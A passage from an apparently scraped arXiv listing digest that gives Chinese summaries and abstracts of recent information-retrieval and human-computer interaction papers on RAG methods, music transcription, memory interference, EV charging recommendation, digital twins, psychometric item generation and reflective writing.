Abstract:In the context of algorithms for problem solving, procedural knowledge – the know-how of algorithm design and operator composition – remains implicit in code, lost between runs, and must be re-engineered for each new domain. Knowledge graphs (KGs) have proven effective for organizing declarative knowledge, yet current KG paradigms provide limited support for representing procedural knowledge as executable, learnable graph structures. We introduce \textitGenerative Executable Algorithm Knowledge Graphs (GEAKG), a class of KGs whose nodes store executable operators, whose edges encode learned composition patterns, and whose traversal generates solutions. A GEAKG is \emphgenerative (topology and operators are synthesized by a Large Language Model), \emphexecutable (every node is runnable code), and \emphtransferable (learned patterns generalize zero-shot across domains). The framework is domain-agnostic at the engine level: the same three-layer architecture and Ant Colony Optimization (ACO)-based learning engine can be instantiated across domains, parameterized by a pluggable ontology (\textttRoleSchema). Two case studies – sharing no domain-specific framework code – provide concrete evidence for this framework hypothesis: (1)~Neural Architecture Search across 70 cross-dataset transfer pairs on two tabular benchmarks, and (2)~Combinatorial Optimization, where knowledge learned on the Traveling Salesman Problem transfers zero-shot to scheduling and assignment domains. Taken together, the results support that algorithmic expertise can be explicitly represented, learned, and transferred as executable knowledge graphs.
[IR-8] Advancing Multi-Instrument Music Transcription: Results from the 2025 AMT Challenge NEURIPS2025
【速读】:该论文旨在解决多乐器音乐转录(Multi-instrument Music Transcription)中的准确性问题,特别是针对复杂音频中多个乐器同时发声(polyphony)和音色差异(timbre variation)的挑战。解决方案的关键在于通过2025年自动音乐转录(Automatic Music Transcription, AMT)挑战赛收集并评估来自八支团队的先进算法,其中两支队伍的表现超越了基线模型MT3,验证了在提升转录精度方面的进展;同时,研究指出未来需加强在更广泛音乐流派覆盖和乐器检测能力上的优化方向。
链接: https://arxiv.org/abs/2603.27528
作者: Ojas Chaturvedi,Kayshav Bhardwaj,Tanay Gondil,Benjamin Shiue-Hal Chou,Kristen Yeon-Ji Yun,Yung-Hsiang Lu,Yujia Yan,Sungkyun Chang
机构: Purdue University (普渡大学); University of Rochester (罗切斯特大学); Queen Mary University of London (伦敦玛丽女王大学)
类目: ound (cs.SD); Information Retrieval (cs.IR)
备注: 7 pages, 3 figures. Accepted to the AI for Music Workshop at NeurIPS 2025
Abstract:This paper presents the results of the 2025 Automatic Music Transcription (AMT) Challenge, an online competition to benchmark progress in multi-instrument transcription. Eight teams submitted valid solutions; two outperformed the baseline MT3 model. The results highlight both advances in transcription accuracy and the remaining difficulties in handling polyphony and timbre variation. We conclude with directions for future challenges: broader genre coverage and stronger emphasis on instrument detection.
[IR-9] he Price of Meaning: Why Every Semantic Memory System Forgets
【速读】:该论文旨在解决生成式 AI (Generative AI) 中记忆系统因语义组织结构导致的固有缺陷问题,即语义一致性带来的干扰、遗忘和错误回忆现象。其核心贡献在于形式化了语义连续核阈值记忆(semantically continuous kernel-threshold memories)中“语义泛化能力”与“干扰不可避免性”之间的权衡关系,并通过理论推导揭示:在有限局部内在维度下,语义表示具有有限有效秩,检索邻域中必然存在正的竞争者质量,导致随记忆增长保留率趋近于零,从而形成幂律遗忘曲线;同时证明对于满足δ-凸性的联想诱饵,仅靠阈值调节无法消除错误回忆。解决方案的关键在于识别出所有测试架构——包括向量检索、图记忆、注意力上下文、BM25文件系统检索及参数化记忆——均无法避免这一根本代价,说明语义组织的“价格”即是干扰,任何试图规避干扰的机制都会牺牲语义泛化能力。
链接: https://arxiv.org/abs/2603.27116
作者: Sambartha Ray Barman,Andrey Starenky,Sofia Bodnar,Nikhil Narasimhan,Ashwin Gopinath
机构: Sentra; Massachusetts Institute of Technology (麻省理工学院)
类目: Artificial Intelligence (cs.AI); Information Retrieval (cs.IR); Neural and Evolutionary Computing (cs.NE)
备注:
Abstract:Every major AI memory system in production today organises information by meaning. That organisation enables generalisation, analogy, and conceptual retrieval – but it comes at a price. We prove that the same geometric structure enabling semantic generalisation makes interference, forgetting, and false recall inescapable. We formalise this tradeoff for \textitsemantically continuous kernel-threshold memories: systems whose retrieval score is a monotone function of an inner product in a semantic feature space with finite local intrinsic dimension. Within this class we derive four results: (1) semantically useful representations have finite effective rank; (2) finite local dimension implies positive competitor mass in retrieval neighbourhoods; (3) under growing memory, retention decays to zero, yielding power-law forgetting curves under power-law arrival statistics; (4) for associative lures satisfying a \delta -convexity condition, false recall cannot be eliminated by threshold tuning. We test these predictions across five architectures: vector retrieval, graph memory, attention-based context, BM25 filesystem retrieval, and parametric memory. Pure semantic systems express the vulnerability directly as forgetting and false recall. Reasoning-augmented systems partially override these symptoms but convert graceful degradation into catastrophic failure. Systems that escape interference entirely do so by sacrificing semantic generalisation. The price of meaning is interference, and no architecture we tested avoids paying it. Subjects: Artificial Intelligence (cs.AI); Information Retrieval (cs.IR); Neural and Evolutionary Computing (cs.NE) Cite as: arXiv:2603.27116 [cs.AI] (or arXiv:2603.27116v1 [cs.AI] for this version) https://doi.org/10.48550/arXiv.2603.27116 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Ashwin Gopinath [view email] [v1] Sat, 28 Mar 2026 04:01:59 UTC (521 KB)
[IR-10] xt Data Integration
【速读】:该论文旨在解决异构数据(特别是结构化与非结构化数据)在存储和处理过程中的整合难题,核心问题在于如何有效融合来自不同来源、格式各异的数据以实现统一访问。其解决方案的关键在于推动文本数据(unstructured data)的集成,通过识别文本中蕴含的知识并将其纳入数据集成框架,从而突破传统系统仅依赖结构化数据的局限性,提升数据工程流程的全面性和实用性。
链接: https://arxiv.org/abs/2603.27055
作者: Md Ataur Rahman,Dimitris Sacharidis,Oscar Romero,Sergi Nadal
机构: 未知
类目: Computation and Language (cs.CL); Information Retrieval (cs.IR)
备注: Accepted for Publication as a Book Chapter in “Data Engineering for Data Science” (ISBN: 978-3-032-18765-9)
Abstract:Data comes in many forms. From a shallow perspective, they can be viewed as being either in structured (e.g., as a relation, as key-value pairs) or unstructured (e.g., text, image) formats. So far, machines have been fairly good at processing and reasoning over structured data that follows a precise schema. However, the heterogeneity of data poses a significant challenge on how well diverse categories of data can be meaningfully stored and processed. Data Integration, a crucial part of the data engineering pipeline, addresses this by combining disparate data sources and providing unified data access to end-users. Until now, most data integration systems have leaned on only combining structured data sources. Nevertheless, unstructured data (a.k.a. free text) also contains a plethora of knowledge waiting to be utilized. Thus, in this chapter, we firstly make the case for the integration of textual data, to later present its challenges, state of the art and open problems.
[IR-11] Resolving the Robustness-Precision Trade-off in Financial RAG through Hybrid Document-Routed Retrieval
【速读】:该论文旨在解决金融文档问答中基于片段(chunk-based retrieval, CBR)的检索增强生成(Retrieval-Augmented Generation, RAG)系统在结构同质性高的语料库(如监管文件)中出现的跨文档片段混淆问题,该问题导致模型在关键场景下产生灾难性错误。同时,现有解决方案如语义文件路由(Semantic File Routing, SFR)虽能提升鲁棒性,但牺牲了细粒度片段检索的精度。论文提出混合文档路由检索(Hybrid Document-Routed Retrieval, HDRR),其核心创新在于设计了一个两阶段架构:第一阶段使用SFR对查询进行文档级过滤,第二阶段在选定文档范围内执行CBR,从而在消除跨文档混淆的同时保留精准的片段级检索能力。实验表明,HDRR在所有评估指标上均优于CBR和SFR,实现了鲁棒性与精度的协同优化。
链接: https://arxiv.org/abs/2603.26815
作者: Zhiyuan Cheng,Longying Lai,Yue Liu
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注: 18 pages, 4 figures, 9 tables. Submitted to Expert Systems with Applications
Abstract:Retrieval-Augmented Generation (RAG) systems for financial document question answering typically follow a chunk-based paradigm: documents are split into fragments, embedded into vector space, and retrieved via similarity search. While effective in general settings, this approach suffers from cross-document chunk confusion in structurally homogeneous corpora such as regulatory filings. Semantic File Routing (SFR), which uses LLM structured output to route queries to whole documents, reduces catastrophic failures but sacrifices the precision of targeted chunk retrieval. We identify this robustness-precision trade-off through controlled evaluation on the FinDER benchmark (1,500 queries across five groups): SFR achieves higher average scores (6.45 vs. 6.02) and fewer failures (10.3% vs. 22.5%), while chunk-based retrieval (CBR) yields more perfect answers (13.8% vs. 8.5%). To resolve this trade-off, we propose Hybrid Document-Routed Retrieval (HDRR), a two-stage architecture that uses SFR as a document filter followed by chunk-based retrieval scoped to the identified document(s). HDRR eliminates cross-document confusion while preserving targeted chunk precision. Experimental results demonstrate that HDRR achieves the best performance on every metric: an average score of 7.54 (25.2% above CBR, 16.9% above SFR), a failure rate of only 6.4%, a correctness rate of 67.7% (+18.7 pp over CBR), and a perfect-answer rate of 20.1% (+6.3 pp over CBR, +11.6 pp over SFR). HDRR resolves the trade-off by simultaneously achieving the lowest failure rate and the highest precision across all five experimental groups.
[IR-12] GroupRAG : Cognitively Inspired Group-Aware Retrieval and Reasoning via Knowledge-Driven Problem Structuring
【速读】:该论文旨在解决语言模型在实际应用中因知识不足和推理能力受限而导致性能下降的问题。现有方法如检索增强生成(Retrieval-Augmented Generation, RAG)和思维链(Chain-of-Thought, CoT)虽能部分缓解上述问题,但在真实场景下表现不稳定。其关键局限在于缺乏对问题结构的充分认知,即未能有效利用问题内部的潜在组织模式进行多视角推理。为此,作者提出GroupRAG框架,其核心创新在于基于知识驱动的关键点分组机制,识别问题中的隐式结构簇,并从多个概念起点并行执行检索与推理,从而实现两者之间的细粒度交互。实验表明,GroupRAG在MedQA数据集上显著优于主流RAG和CoT基线方法,验证了借鉴人类认知中问题空间搜索机制、显式建模问题结构是提升鲁棒性检索增强推理的有效路径。
链接: https://arxiv.org/abs/2603.26807
作者: Xinyi Duan,Yuanrong Tang,Jiangtao Gong
机构: Tsinghua University (清华大学)
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: 9 pages, 3 figures
Abstract:The performance of language models is commonly limited by insufficient knowledge and constrained reasoning. Prior approaches such as Retrieval-Augmented Generation (RAG) and Chain-of-Thought (CoT) address these issues by incorporating external knowledge or enforcing linear reasoning chains, but often degrade in real-world settings. Inspired by cognitive science, which characterizes human problem solving as search over structured problem spaces rather than single inference chains, we argue that inadequate awareness of problem structure is a key overlooked limitation. We propose GroupRAG, a cognitively inspired, group-aware retrieval and reasoning framework based on knowledge-driven keypoint grouping. GroupRAG identifies latent structural groups within a problem and performs retrieval and reasoning from multiple conceptual starting points, enabling fine-grained interaction between the two processes. Experiments on MedQA show that GroupRAG outperforms representative RAG- and CoT-based baselines. These results suggest that explicitly modeling problem structure, as inspired by human cognition, is a promising direction for robust retrieval-augmented reasoning.
[IR-13] EVNextTrade: Learning-to-Rank-Based Recommendation of Next Charging Nodes for EV-EV Energy Trading
【速读】:该论文旨在解决电动汽车(Electric Vehicles, EVs)在行程场景中如何识别更合适的充电节点以支持车对车(peer-to-peer, P2P)能量交易的问题,这一问题在现有研究中尚未得到充分探讨。解决方案的关键在于将充电节点推荐建模为一个学习排序(learning-to-rank)问题,并构建一个基于监督学习的排序框架,该框架利用大规模城市EV出行数据集(包含数百万条行程记录)和多维交易相关特征(如电量水平、交易角色、距离、充电速度及站点时间热度等)进行训练。为应对能源提供方与消费者移动性带来的不确定性以及决策点存在多个可行充电节点的情况,作者引入概率相关性精化机制生成分级标签,从而提升模型对排序质量的捕捉能力。实验表明,LightGBM在NDCG@k、Recall@k和MRR等指标上表现最优,尤其在早期排名精度方面突出,验证了该不确定性感知的学习排序方法在提升去中心化EV-EV能量交易系统匹配效率方面的有效性。
链接: https://arxiv.org/abs/2603.26688
作者: Md Mahfujur Rahmana,Alistair Barros,Raja Jurdak,Darshika Koggalahewa
机构: Queensland University of Technology (昆士兰科技大学)
类目: Information Retrieval (cs.IR); Machine Learning (cs.LG)
备注:
Abstract:Peer-to-peer energy trading among electric vehicles (EVs) has been increasingly studied as a promising solution for improving supply-side resilience under growing charging demand and constrained charging infrastructure. While prior studies on EV-EV energy trading and related EV research have largely focused on transaction management or isolated mobility prediction tasks, the problem of identifying which charging nodes are more suitable for EV-EV trading in journey contexts remains open. We address this gap by formulating next charging nodes recommendation as a learning-to-rank problem, where each EV decision event is associated with a set of candidate charging locations. We propose a supervised ranking framework applied to a large-scale urban EV mobility dataset comprising millions of journey records and multidimensional EV trading-related features, including EV energy level, trading role, distance to charging locations, charging speed, and temporal station popularity. To account for uncertainty arising from the mobility of both energy providers and consumers, as well as the presence of multiple viable charging nodes at a decision point, we employ probabilistic relevance refinement to generate graded labels for ranking. We evaluate gradient-boosted learning-to-rank models, including LightGBM, XGBoost, and CatBoost, on EV journey records enriched with candidate charging nodes. Experimental results show that LightGBM consistently achieves the strongest ranking performance across standard metrics, including NDCG@k, Recall@k, and MRR, with particularly strong early-ranking quality, reflected in the highest NDCG@1 (0.9795) and MRR (0.9990). These results highlight the effectiveness of uncertainty-aware learning-to-rank for charging node recommendation and support improved coordination and matching in decentralized EV-EV energy trading systems.
[IR-14] LITTA: Late-Interaction and Test-Time Alignment for Visually-Grounded Multimodal Retrieval
【速读】:该论文旨在解决从视觉信息丰富的文档(如教科书、技术报告和手册)中检索相关证据页面的挑战,这些问题通常由长上下文、复杂布局以及用户查询与支持页面之间弱词汇重叠所导致。解决方案的关键在于提出一种以查询扩展为核心的检索框架LITTA,其在不重新训练检索器的前提下,利用大语言模型生成互补的查询变体,并通过一个冻结的视觉检索器结合晚期交互评分机制对每个变体进行候选页面检索;随后采用互斥排名融合(reciprocal rank fusion)聚合多查询结果,从而提升证据覆盖范围并降低对单一表述方式的敏感性。该方法在多个领域(计算机科学、制药和工业手册)上均显著提升了top-k准确率、召回率和平均倒数排名(MRR),尤其在视觉和语义变化较大的场景下收益明显,且可通过控制查询变体数量灵活调节精度与效率的权衡关系,具备实际部署潜力。
链接: https://arxiv.org/abs/2603.26683
作者: Seonok Kim
机构: Mazelone
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Retrieving relevant evidence from visually rich documents such as textbooks, technical reports, and manuals is challenging due to long context, complex layouts, and weak lexical overlap between user questions and supporting pages. We propose LITTA, a query-expansion-centric retrieval framework for evidence page retrieval that improves multimodal document retrieval without retriever retraining. Given a user query, LITTA generates complementary query variants using a large language model and retrieves candidate pages for each variant using a frozen vision retriever with late-interaction scoring. Candidates from expanded queries are then aggregated through reciprocal rank fusion to improve evidence coverage and reduce sensitivity to any single phrasing. This simple test-time strategy significantly improves retrieval robustness while remaining compatible with existing multimodal embedding indices. We evaluate LITTA on visually grounded document retrieval tasks across three domains: computer science, pharmaceuticals, and industrial manuals. Multi-query retrieval consistently improves top-k accuracy, recall, and MRR compared to single-query retrieval, with particularly large gains in domains with high visual and semantic variability. Moreover, the accuracy-efficiency trade-off is directly controllable by the number of query variants, making LITTA practical for deployment under latency constraints. These results demonstrate that query expansion provides a simple yet effective mechanism for improving visually grounded multimodal retrieval.
[IR-15] SRAG : RAG with Structured Data Improves Vector Retrieval
【速读】:该论文旨在解决传统检索增强生成(Retrieval Augmented Generation, RAG)系统在信息检索阶段依赖纯向量相似度匹配所带来的局限性,即检索结果可能缺乏语义结构化信息,导致对复杂问题(如比较、分析和预测类问题)的回答质量受限。解决方案的关键在于提出结构化检索增强生成(Structured Retrieval Augmented Generation, SRAG),通过在查询和文档块中引入结构化元数据(如主题、情感、查询/块类型、知识图谱三元组和语义标签),显著提升向量表示的质量与语义丰富度,从而改善检索精度和答案相关性。实验表明,该方法在基于GPT-5的评估中使问答系统得分平均提升30%(p值=2e-13),尤其在复杂任务上效果突出,并展现出更广泛、多样且类似事件记忆的检索能力。
链接: https://arxiv.org/abs/2603.26670
作者: Shalin Shah,Srikanth Ryali,Ramasubbu Venkatesh
机构: Anvai AI
类目: Information Retrieval (cs.IR); Computation and Language (cs.CL)
备注:
Abstract:Retrieval Augmented Generation (RAG) provides the necessary informational grounding to LLMs in the form of chunks retrieved from a vector database or through web search. RAG could also use knowledge graph triples as a means of providing factual information to an LLM. However, the retrieval is only based on representational similarity between a question and the contents. The performance of RAG depends on the numeric vector representations of the query and the chunks. To improve these representations, we propose Structured RAG (SRAG), which adds structured information to a query as well as the chunks in the form of topics, sentiments, query and chunk types (e.g., informational, quantitative), knowledge graph triples and semantic tags. Experiments indicate that this method significantly improves the retrieval process. Using GPT-5 as an LLM-as-a-judge, results show that the method improves the score given to answers in a question answering system by 30% (p-value = 2e-13) (with tighter bounds). The strongest improvement is in comparative, analytical and predictive questions. The results suggest that our method enables broader, more diverse, and episodic-style retrieval. Tail risk analysis shows that SRAG attains very large gains more often, with losses remaining minor in magnitude.
[IR-16] ReCQR: Incorporating conversational query rewriting to improve Multimodal Image Retrieval
【速读】:该论文旨在解决现有图像检索模型在处理长文本和模糊用户表达时表现不佳的问题。其核心解决方案是引入对话式查询重写(Conversational Query Rewriting, CQR)任务,并构建了一个基于多轮对话历史的专用重写数据集ReCQR。关键创新在于利用大语言模型(Large Language Models, LLMs)大规模生成重写候选,结合LLM-as-Judge机制与人工审核筛选出约7000条高质量多模态对话样本,从而实现将用户最终查询转化为语义完整且简洁的版本,显著提升图像检索准确率,并为多模态系统中用户查询建模提供了新方向。
链接: https://arxiv.org/abs/2603.26669
作者: Yuan Hu,ZhiYu Cao,PeiFeng Li,QiaoMing Zhu
机构: 未知
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 4 pages,3 figures
Abstract:With the rise of multimodal learning, image retrieval plays a crucial role in connecting visual information with natural language queries. Existing image retrievers struggle with processing long texts and handling unclear user expressions. To address these issues, we introduce the conversational query rewriting (CQR) task into the image retrieval domain and construct a dedicated multi-turn dialogue query rewriting dataset. Built on full dialogue histories, CQR rewrites users’ final queries into concise, semantically complete ones that are better suited for retrieval. Specifically, We first leverage Large Language Models (LLMs) to generate rewritten candidates at scale and employ an LLM-as-Judge mechanism combined with manual review to curate approximately 7,000 high-quality multimodal dialogues, forming the ReCQR dataset. Then We benchmark several SOTA multimodal models on the ReCQR dataset to assess their performance on image retrieval. Experimental results demonstrate that CQR not only significantly enhances the accuracy of traditional image retrieval models, but also provides new directions and insights for modeling user queries in multimodal systems.
[IR-17] Bridge-RAG : An Abstract Bridge Tree Based Retrieval Augmented Generation Algorithm With Cuckoo Filter
【速读】:该论文旨在解决检索增强生成(Retrieval-Augmented Generation, RAG)框架中面临的两个核心问题:检索准确性和计算效率。针对准确性不足的问题,提出引入“抽象”(abstract)作为查询实体与文档片段之间的语义桥梁,并构建树状结构组织抽象信息,设计多级检索策略以确保上下文信息的充分覆盖;为提升效率,创新性地采用改进的布谷鸟过滤器(improved Cuckoo Filter)加速实体定位,并结合块链表结构与基于实体温度的排序机制,优化空间和时间局部性。实验表明,所提Bridge-RAG框架在准确率上提升约15.65%,同时将检索耗时降低10倍至500倍。
链接: https://arxiv.org/abs/2603.26668
作者: Zihang Li,Wenjun Liu,Yikun Zong,Jiawen Tao,Siying Dai,Songcheng Ren,Zirui Liu,Yanbing Jiang,Tong Yang
机构: Peking University (北京大学)
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注:
Abstract:As an important paradigm for enhancing the generation quality of Large Language Models (LLMs), retrieval-augmented generation (RAG) faces the two challenges regarding retrieval accuracy and computational efficiency. This paper presents a novel RAG framework called Bridge-RAG. To overcome the accuracy challenge, we introduce the concept of abstract to bridge query entities and document chunks, providing robust semantic understanding. We organize the abstracts into a tree structure and design a multi-level retrieval strategy to ensure the inclusion of sufficient contextual information. To overcome the efficiency challenge, we introduce the improved Cuckoo Filter, an efficient data structure supporting rapid membership queries and updates, to accelerate entity location during the retrieval process. We design a block linked list structure and an entity temperature-based sorting mechanism to improve efficiency from the aspects of spatial and temporal locality. Extensive experiments show that Bridge-RAG achieves around 15.65% accuracy improvement and reduces 10x to 500x retrieval time compared to other RAG frameworks.
[IR-18] M-RAG : Making RAG Faster Stronger and More Efficient
【速读】:该论文旨在解决传统检索增强生成(Retrieval-Augmented Generation, RAG)系统因依赖文本分块(text chunking)构建检索单元而引发的信息碎片化、检索噪声和效率低下等问题,同时回应近期研究对RAG必要性的质疑——即长上下文大语言模型(LLM)是否足以替代多阶段检索流程。其解决方案的关键在于提出一种无分块(chunk-free)的检索策略M-RAG,通过提取结构化的k-v分解元标记(meta-markers),将轻量级意图对齐的检索键(retrieval key)与富含上下文的信息值(information value)分离,从而实现高效且稳定的查询-键相似性匹配,同时不牺牲生成能力。实验表明,M-RAG在不同token预算下均优于基于分块的RAG基线,尤其在低资源场景下表现更优,验证了检索表示与生成解耦的有效性。
链接: https://arxiv.org/abs/2603.26667
作者: Sun Xu,Tongkai Xu,Baiheng Xie,Li Huang,Qiang Gao,Kunpeng Zhang
机构: Southwestern University of Finance and Economics, Chengdu, China; Zhida AI, Zhida Technology, Chengdu, China; University of Maryland, College Park, USA
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI)
备注:
Abstract:Retrieval-Augmented Generation (RAG) has become a widely adopted paradigm for enhancing the reliability of large language models (LLMs). However, RAG systems are sensitive to retrieval strategies that rely on text chunking to construct retrieval units, which often introduce information fragmentation, retrieval noise, and reduced efficiency. Recent work has even questioned the necessity of RAG, arguing that long-context LLMs may eliminate multi-stage retrieval pipelines by directly processing full documents. Nevertheless, expanded context capacity alone does not resolve the challenges of relevance filtering, evidence prioritization, and isolating answer-bearing information. To this end, we proposed M-RAG, a novel Chunk-free retrieval strategy. Instead of retrieving coarse-grained textual chunks, M-RAG extracts structured, k-v decomposition meta-markers, with a lightweight, intent-aligned retrieval key for retrieval and a context-rich information value for generation. Under this setting, M-RAG enables efficient and stable query-key similarity matching without sacrificing expressive ability. Experimental results on the LongBench subtasks demonstrate that M-RAG outperforms chunk-based RAG baselines across varying token budgets, particularly under low-resource settings. Extensive analysis further reveals that M-RAG retrieves more answer-friendly evidence with high efficiency, validating the effectiveness of decoupling retrieval representation from generation and highlighting the proposed strategy as a scalable and robust alternative to existing chunk-based methods.
[IR-19] Autonomous Agent -Orchestrated Digital Twins (AADT): Leverag ing the OpenClaw Framework for State Synchronization in Rare Genetic Disorders
【速读】:该论文旨在解决医学数字孪生(Medical Digital Twins, MDTs)在实际应用中普遍存在的静态或被动更新问题,导致其与患者动态变化的表型、基因组解读及临床指南之间存在显著同步延迟,尤其在罕见遗传病场景下更为突出。解决方案的关键在于提出一种自主代理协调的数字孪生框架(Autonomous Agent-orchestrated Digital Twin, AADT),通过OpenClaw的主动“心跳”机制和模块化代理技能(Agent Skills),实现对本地与外部数据流(如患者报告的表型变化、变异分类数据库更新)的持续监控,并自动执行数据摄入、标准化、状态更新及触发式分析等流程,从而确保MDT状态能够实时同步于患者的纵向表型演变和不断演进的基因组知识,提升罕见病早期诊断准确性和疾病进展建模能力。
链接: https://arxiv.org/abs/2603.27104
作者: Hongzhuo Chen,Zhanliang Wang,Quan M. Nguyen,Gongbo Zhang,Chunhua Weng,Kai Wang
机构: 未知
类目: Quantitative Methods (q-bio.QM); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注:
Abstract:Background: Medical Digital Twins (MDTs) are computational representations of individual patients that integrate clinical, genomic, and physiological data to support diagnosis, treatment planning, and outcome prediction. However, most MDTs remain static or passively updated, creating a critical synchronization gap, especially in rare genetic disorders where phenotypes, genomic interpretations, and care guidelines evolve over time. Methods: We propose an agent-orchestrated digital twin framework using OpenClaw’s proactive “heartbeat” mechanism and modular Agent Skills. This Autonomous Agent-orchestrated Digital Twin (AADT) system continuously monitors local and external data streams (e.g., patient-reported phenotypes and updates in variant classification databases) and executes automated workflows for data ingestion, normalization, state updates, and trigger-based analysis. Results: A prototype implementation demonstrates that agent orchestration can continuously synchronize MDT states with both longitudinal phenotype updates and evolving genomic knowledge. In rare disease settings, this enables earlier diagnosis and more accurate modeling of disease progression. We present two case studies, including variant reinterpretation and longitudinal phenotype tracking, highlighting how AADTs support timely, auditable updates for both research and clinical care. Conclusion: The AADT framework addresses the key bottleneck of real-time synchronization in MDTs, enabling scalable and continuously updated patient models. We also discuss data security considerations and mitigation strategies through human-in-the-loop system design. Subjects: Quantitative Methods (q-bio.QM); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR) Cite as: arXiv:2603.27104 [q-bio.QM] (or arXiv:2603.27104v1 [q-bio.QM] for this version) https://doi.org/10.48550/arXiv.2603.27104 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Kai Wang [view email] [v1] Sat, 28 Mar 2026 03:18:21 UTC (815 KB)
人机交互
[HC-0] he Ultimate Tutorial for AI-driven Scale Development in Generative Psychometrics: Releasing AIGENIE from its Bottle
【速读】:该论文旨在解决心理量表开发过程中传统方法依赖大量专家参与、迭代修订及大规模预测试的问题,从而显著延长开发周期。其解决方案的关键在于提出并实现了一个名为AI-GENIE(Automatic Item Generation with Network-Integrated Evaluation)的框架,该框架将大语言模型(Large Language Model, LLM)文本生成能力与网络心理测量方法相结合,通过自动化流程生成候选题项池,并利用多步降维管道(包括探索性图分析Exploratory Graph Analysis, EGA;唯一变量分析Unique Variable Analysis, UVA;以及Bootstrap EGA)在计算机内部完成结构验证,最终输出结构有效的题项池,极大提升了心理量表早期开发阶段的效率和可扩展性。
链接: https://arxiv.org/abs/2603.28643
作者: Lara Russell-Lasalandra,Hudson Golino,Luis Eduardo Garrido,Alexander P. Christensen
机构: University of Virginia (弗吉尼亚大学); Pontificia Universidad Madre y Maestra (母与教师宗座大学); Vanderbilt University (范德比尔特大学)
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Human-Computer Interaction (cs.HC)
备注: 38 pages, 8 Figures, 3 tables
Abstract:Psychological scale development has traditionally required extensive expert involvement, iterative revision, and large-scale pilot testing before psychometric evaluation can begin. The AIGENIE R package implements the AI-GENIE framework (Automatic Item Generation with Network-Integrated Evaluation), which integrates large language model (LLM) text generation with network psychometric methods to automate the early stages of this process. The package generates candidate item pools using LLMs, transforms them into high-dimensional embeddings, and applies a multi-step reduction pipeline – Exploratory Graph Analysis (EGA), Unique Variable Analysis (UVA), and bootstrap EGA – to produce structurally validated item pools entirely in silico. This tutorial introduces the package across six parts: installation and setup, understanding Application Programming Interfaces (APIs), text generation, item generation, the AIGENIE function, and the GENIE function. Two running examples illustrate the package’s use: the Big Five personality model (a well-established construct) and AI Anxiety (an emerging construct). The package supports multiple LLM providers (OpenAI, Anthropic, Groq, HuggingFace, and local models), offers a fully offline mode with no external API calls, and provides the GENIE() function for researchers who wish to apply the psychometric reduction pipeline to existing item pools regardless of their origin. The AIGENIE package is freely available on R-universe at this https URL.
[HC-1] One stout to rule them all: Reconciling artificial intelligence data science and malted alcoholic beverag es
【速读】:该论文旨在解决手工啤酒(craft beer)消费趋势与消费者偏好之间信息不对称的问题,即啤酒生产者难以准确把握消费者对多样且复杂的风味特征的偏好,从而导致市场响应滞后。其解决方案的关键在于提出一种名为分布式饮料分析(Distributed Beverage Analysis, DBA)的协作式数据收集与分析框架,通过实证验证该框架能够识别共性趋势并提供数据支持,进而提升对消费者需求的理解能力。研究进一步评估了多种大型语言模型(Large Language Models, LLMs)在该框架下的表现,证实当前多数AI模型无法可靠地推理手工啤酒领域不断演变的趋势与模式。
链接: https://arxiv.org/abs/2603.28607
作者: Dmitrii Usynin,Elena Shmakova,Michael Rheinberger
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Beer is a phenomenal beverage. It has previously shaped the history of many peoples, states and cultures. The beauty of beer is its versatility. Starting from the original implementations that were murky or diluted, over time researchers found novel approaches to gradually develop beverages that are diverse, intense and are pleasant for the end user. Recently, the industry came up with the so-called \textitcraft beers, that often differ from the commercial beers in production volume (due to lower capacities of the craft beer producers) and tasting profile (often having more intense unusual flavours). However, while it is often relatively easy to judge if a particular commercial beer is likely to be enjoyable, the same cannot be said about craft beers, as there are far too many styles, implementations and ingredients involved in their production. This creates a gap between the beverage producers and the consumers due to the inability of the former to judge the preferences and the consumption trends of the latter. As a response to this challenge we present a novel collaborative beverage-related data collection and analysis framework - the Distributed Beverage Analysis (DBA). The idea behind this study is to identify the common trends and support them by empirical evidence to better understand the needs of the consumers. We empirically verify DBA at the biannual \textitKraft Bier Fest conducted by Vienna Kraft brewery in (you guessed it) Vienna. To showcase a need in such kind of analysis, we evaluate various large language models (LLMs) against our collaborative framework and confirm that many AI models cannot be reliably used to reason over the trends and patterns in the evolving world of craft beer.
[HC-2] Moving Beyond Review: Applying Language Models to Planning and Translation in Reflection
【速读】:该论文旨在解决学生在反思性写作(reflective writing)中难以进行深度反思、从而限制学习效果提升的问题。现有研究虽表明大语言模型(LLMs)可改善写作技能,但其应用多集中于对已完成文本的反馈,缺乏对写作规划与组织阶段的支持。论文提出的关键解决方案是基于写作认知过程理论(Cognitive Process Theory of writing, CPT),首次将LLMs应用于反思性写作的规划(planning)和翻译(translation)两个关键阶段:设计了名为Pensée的工具,通过对话式代理引导结构化反思规划,并自动提取核心概念辅助表达转化。实验结果表明,在规划与翻译阶段引入显式AI支持能显著提升反思深度和结构质量,验证了以理论为驱动的LLM干预策略的有效性。
链接: https://arxiv.org/abs/2603.28596
作者: Seyed Parsa Neshaei,Richard Lee Davis,Tanja Käser
机构: 未知
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: Accepted at AIED 2026
Abstract:Reflective writing is known to support the development of students’ metacognitive skills, yet learners often struggle to engage in deep reflection, limiting learning gains. Although large language models (LLMs) have been shown to improve writing skills, their use as conversational agents for reflective writing has produced mixed results and has largely focused on providing feedback on reflective texts, rather than support during planning and organizing. In this paper, inspired by the Cognitive Process Theory of writing (CPT), we propose the first application of LLMs to the planning and translation steps of reflective writing. We introduce Pensée, a tool to explore the effects of explicit AI support during these stages by scaffolding structured reflection planning using a conversational agent, and supporting translation by automatically extracting key concepts. We evaluate Pensée in a controlled between-subjects experiment (N=93), manipulating AI support across writing phases. Results show significantly greater reflection depth and structural quality when learners 